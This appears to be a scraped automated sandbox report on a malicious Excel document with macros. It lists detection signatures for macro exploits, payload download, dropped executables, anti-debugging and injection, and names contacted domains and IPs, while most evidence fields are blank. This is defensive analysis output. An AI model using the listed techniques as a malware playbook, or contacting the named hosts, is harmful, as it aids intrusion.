Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Source: |
File opened: |
Jump to behavior |
Source: |
HTTPS traffic detected: |
Source: |
Binary string: |
||
Source: |
Binary string: |
Source: |
Code function: |
4_2_6E725D36 |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) |
Source: |
File created: |
Jump to behavior |
Document exploit detected (drops PE files) |
Source: |
File created: |
Jump to dropped file |
Document exploit detected (UrlDownloadToFile) |
Source: |
Section loaded: |
Jump to behavior |
Document exploit detected (process start blacklist hit) |
Source: |
Process created: |
Potential document exploit detected (performs DNS queries) |
Source: |
DNS query: |
Potential document exploit detected (performs HTTP gets) |
Source: |
TCP traffic: |
Potential document exploit detected (unknown TCP traffic) |
Source: |
TCP traffic: |
Networking: |
---|
JA3 SSL client fingerprint seen in connection with other malware |
Source: |
JA3 fingerprint: |
Source: |
File created: |
Jump to behavior |
Source: |
String found in binary or memory: |
Source: |
DNS traffic detected: |
Source: |
String found in binary or memory: |
||
Source: |
String found in binary or memory: |
||
Source: |
String found in binary or memory: |
||
Source: |
String found in binary or memory: |
||
Source: |
String found in binary or memory: |
||
Source: |
String found in binary or memory: |
||
Source: |
String found in binary or memory: |
||
Source: |
String found in binary or memory: |
||
Source: |
String found in binary or memory: |
||
Source: |
String found in binary or memory: |
Source: |
Network traffic detected: |
||
Source: |
Network traffic detected: |
Source: |
HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: |
Screenshot OCR: |
||
Source: |
Screenshot OCR: |
||
Source: |
Screenshot OCR: |
||
Source: |
Screenshot OCR: |
||
Source: |
Screenshot OCR: |
||
Source: |
Screenshot OCR: |
||
Source: |
Screenshot OCR: |
||
Source: |
Screenshot OCR: |
||
Source: |
Screenshot OCR: |
||
Source: |
Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: |
Initial sample: |
||
Source: |
Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: |
Initial sample: |
Office process drops PE file |
Source: |
File created: |
Jump to dropped file | ||
Source: |
File created: |
Jump to dropped file |
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc) |
Source: |
Memory allocated: |
Jump to behavior | ||
Source: |
Memory allocated: |
Jump to behavior |
Detected potential crypto function |
Source: |
Code function: |
4_2_6E72A4E1 | |
Source: |
Code function: |
4_2_6E71353B | |
Source: |
Code function: |
4_2_6E71F5B3 | |
Source: |
Code function: |
4_2_6E721580 | |
Source: |
Code function: |
4_2_6E777C26 | |
Source: |
Code function: |
4_2_6E77B44E | |
Source: |
Code function: |
4_2_6E78798C |
Document contains embedded VBA macros |
Source: |
OLE indicator, VBA macros: |
Dropped file seen in connection with other malware |
Source: |
Dropped File: |
||
Source: |
Dropped File: |
Found potential string decryption / allocating functions |
Source: |
Code function: |
Yara signature match |
Source: |
Matched rule: |
Source: |
Binary or memory string: |
Source: |
Classification label: |
Source: |
File created: |
Jump to behavior |
Source: |
File created: |
Jump to behavior |
Source: |
OLE indicator, Workbook stream: |
Source: |
File read: |
Jump to behavior |
Source: |
Key opened: |
Jump to behavior |
Source: |
Process created: |
Source: |
Process created: |
|||
Source: |
Process created: |
|||
Source: |
Process created: |
|||
Source: |
Process created: |
Jump to behavior | ||
Source: |
Process created: |
Jump to behavior |
Source: |
Window detected: |
Source: |
Key opened: |
Jump to behavior |
Source: |
File opened: |
Jump to behavior |
Source: |
Binary string: |
||
Source: |
Binary string: |
Data Obfuscation: |
---|
Uses code obfuscation techniques (call, push, ret) |
Source: |
Code function: |
4_2_6E72AC34 | |
Source: |
Code function: |
4_2_6E779700 | |
Source: |
Code function: |
4_2_6E73C6D6 | |
Source: |
Code function: |
4_2_6E73EEC5 | |
Source: |
Code function: |
4_2_6E73D7D4 | |
Source: |
Code function: |
4_2_6E73CAF0 | |
Source: |
Code function: |
4_2_6E73E144 | |
Source: |
Code function: |
4_2_6E7906A8 | |
Source: |
Code function: |
4_2_6E791CD7 | |
Source: |
Code function: |
4_2_6E7929F7 |
Persistence and Installation Behavior: |
---|
Drops PE files |
Source: |
File created: |
Jump to dropped file | ||
Source: |
File created: |
Jump to dropped file |
Drops PE files to the user directory |
Source: |
File created: |
Jump to dropped file |
Drops files with a non-matching file extension (content does not match file extension) |
Source: |
File created: |
Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: |
File created: |
Jump to dropped file |
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior | ||
Source: |
Process information set: |
Jump to behavior |
Malware Analysis System Evasion: |
---|
Found dropped PE file which has not been started or loaded |
Source: |
Dropped PE file which has not been started: |
Jump to dropped file |
Found large amount of non-executed APIs |
Source: |
API coverage: |
Source: |
Code function: |
4_2_6E725D36 |
Anti Debugging: |
---|
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress) |
Source: |
Code function: |
4_2_6E717C49 |
Contains functionality to check if a debugger is running (IsDebuggerPresent) |
Source: |
Code function: |
4_2_6E7237A2 |
Contains functionality to read the PEB |
Source: |
Code function: |
4_2_6E722A8C | |
Source: |
Code function: |
4_2_6E725960 | |
Source: |
Code function: |
4_2_6E78FEC2 | |
Source: |
Code function: |
4_2_6E78FDF8 | |
Source: |
Code function: |
4_2_6E78F9FF |
Contains functionality which may be used to detect a debugger (GetProcessHeap) |
Source: |
Code function: |
4_2_6E717D3A |
Source: |
Code function: |
4_2_6E71A7E7 | |
Source: |
Code function: |
4_2_6E7237A2 | |
Source: |
Code function: |
4_2_6E71A9E4 |
HIPS / PFW / Operating System Protection Evasion: |
---|
Creates a process in suspended mode (likely to inject code) |
Source: |
Process created: |
Jump to behavior |
Language, Device and Operating System Detection: |
---|
Contains functionality to query CPU information (cpuid) |
Source: |
Code function: |
4_2_6E71AB0A |
Contains functionality to query locales information (e.g. system language) |
Source: |
Code function: |
4_2_6E784633 | |
Source: |
Code function: |
4_2_6E783A74 | |
Source: |
Code function: |
4_2_6E783A08 | |
Source: |
Code function: |
4_2_6E77FABC | |
Source: |
Code function: |
4_2_6E7840E2 |
Source: |
Code function: |
4_2_6E71AD36 |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.67.151.10 | otusmail.com | United States | 13335 | CLOUDFLARENETUS | false |
Name | IP | Active |
---|---|---|
otusmail.com | 172.67.151.10 | true |
cdn.digicertcdn.com | 104.18.10.39 | true |